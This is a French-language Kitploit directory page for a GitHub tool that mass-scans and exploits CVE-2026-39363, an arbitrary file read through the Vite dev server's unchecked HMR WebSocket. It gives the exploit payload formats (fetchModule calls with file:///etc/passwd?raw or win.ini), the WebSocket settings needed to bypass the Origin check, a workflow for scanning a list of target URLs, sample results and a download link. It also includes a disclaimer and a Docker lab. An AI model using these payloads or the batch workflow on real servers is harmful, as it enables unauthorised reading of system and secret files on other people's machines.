Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-39363 — Scanner de vulnérabilités par lot pour CVE-2026-39363 dans le serveur de développement Vite, exploitant le contournement de la validation d'origine WebSocket pour lire des fichiers arbitraires via fetchModule avec le protocole file://. | Kitploit
Outils/GitHubGitHub/f4s1on/cve-2026-39363
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubf4s1on/cve-2026-39363

CVE-2026-39363

Scanner de vulnérabilités par lot pour CVE-2026-39363 dans le serveur de développement Vite, exploitant le contournement de la validation d'origine WebSocket pour lire des fichiers arbitraires via fetchModule avec le protocole file://.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-39363 — Lecture arbitraire de fichiers via WebSocket du serveur de développement Vite (détection en masse)

Avertissement : Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche pédagogique. L'utilisateur doit se conformer aux lois et réglementations locales ; scanner ou attaquer les systèmes d'autrui sans autorisation est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive.

Description de la vulnérabilité

Le serveur de développement Vite (6.0.0 ~ 6.4.1, 7.0.0 ~ 7.3.1, 8.0.0 ~ 8.0.4) ne vérifie pas l'en-tête Origin de son WebSocket HMR. Un attaquant peut invoquer fetchModule via l'événement vite:invoke, en utilisant le protocole file:// avec le paramètre ?raw pour contourner la restriction server.fs.allow et lire n'importe quel fichier du serveur.

Processus de détection

root@kitploit:~
url.txt → http://host:port
  ↓ analyse host + port
  ↓
┌─ Étape 1 : tentative ws://host:port donné
│  ├─ Handshake WebSocket réussi + exploit réussi → vulnérable
│  └─ échec → si le port donné == 5173 → non vulnérable
│
└─ Étape 3 : sondage de host:5173 (uniquement si le port donné ≠ 5173)
   ├─ port fermé → non vulnérable
   └─ port ouvert → handshake WebSocket + exploit sur 5173
        ├─ succès → vulnérable
        └─ échec → non vulnérable

Utilisation

Installation des dépendances

root@kitploit:~
pip install -r requirements.txt

Activer et désactiver le proxy

Pour activer le proxy, décommentez les lignes 26-27 du script

root@kitploit:~
# Pour activer le proxy, décommentez les deux lignes ci-dessous et définissez l'adresse et le port du proxy
# os.environ["HTTP_PROXY"] = "http://127.0.0.1:8083"
# os.environ["HTTPS_PROXY"] = "http://127.0.0.1:8083"

Préparation des cibles

Écrivez les URL cibles dans url.txt, une par ligne :

root@kitploit:~
http://192.168.1.100:5173
http://example.com
http://target.cn:8080

Exécution

root@kitploit:~
python cve_2026_39363.py

Sortie

Terminal :

root@kitploit:~
[*] Loaded 3 URL(s), scanning with 3 thread(s)...

http://192.168.1.100:5173 存在漏洞 (Linux)
http://example.com 存在漏洞 (Linux)
http://target.cn:8080 不存在漏洞

[*] Done. 2/3 vulnerable, elapsed 3.2s
[*] Results saved to result.txt

result.txt :

root@kitploit:~
http://192.168.1.100:5173 (Linux)
http://example.com:5173 (Linux)

Chaque ligne contient le type de POC (Linux / Windows), identifiant les caractéristiques du fichier lu avec succès.

Fichiers de validation POC

Système cibleFichier luMarqueur caractéristique
Linuxfile:///etc/passwd?rawroot:
Windowsfile:///C:/Windows/win.ini?rawfor 16-bit app support

Payload de l'exploit

Deux formats de payload sont pris en charge (essayés dans l'ordre) :

  1. Format PoC Vulhub : {"id":"send:0","name":"fetchModule","data":[file_path]}
  2. Format RPC interne : {"fn":"fetchModule","args":[file_path]}

Paramètres clés du WebSocket

ParamètreValeurRaison
Sous-protocolevite-hmrExigence du WebSocket HMR de Vite
OriginEnvoi supprimé (suppress_origin=True)Vite rejette les connexions non-navigateur avec un en-tête Origin

Test de l'environnement vulnérable Docker

root@kitploit:~
# Démarrage
docker run -d --name vite-vuln -p 5173:5173 vulhub/vite:7.3.1

# Analyse
echo "http://127.0.0.1:5173" > url.txt
python cve_2026_39363.py

# Nettoyage
docker stop vite-vuln && docker rm vite-vuln

Questions fréquentes

Q : Toutes les détections renvoient « non vulnérable » ?

  • Vérifiez que le port 5173 de la cible est ouvert
  • Vérifiez que le serveur de développement Vite est exposé au réseau via --host ou server.host
  • Vérifiez que le WebSocket n'est pas désactivé par server.ws: false

Q : Sortie illisible sous Windows ?

  • Le script gère cela automatiquement ; si le problème persiste, vérifiez que le terminal est en encodage UTF-8

Q : Le url.txt généré par PowerShell ne peut pas être analysé ?

  • Le script utilise utf-8-sig pour ignorer automatiquement le BOM
Télécharger l’outil